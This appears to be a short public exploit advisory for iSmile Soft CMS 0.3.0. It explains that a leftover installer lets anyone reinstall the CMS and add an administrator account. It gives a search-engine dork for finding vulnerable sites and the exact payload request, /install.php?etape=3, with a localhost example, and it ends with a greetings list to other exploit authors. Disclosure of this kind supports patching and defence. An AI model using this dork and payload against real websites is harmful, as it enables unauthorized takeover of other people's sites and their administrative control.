iSmile Soft CMS version 0.3.0 suffers from an add administrator vulnerability.
====================================================================================================================================
| # Title : iSmile Soft CMS v0.3.0 Add Admin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |
| # Vendor : https://www.helpernt.com/ |
| # Dork : JamalCom هذا السكربت مبرمج بواسطة |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer.
It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file.
[+] use payload : /install.php?etape=3
[+] http://127.0.0.1/iSmile/install.php?etape=3
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
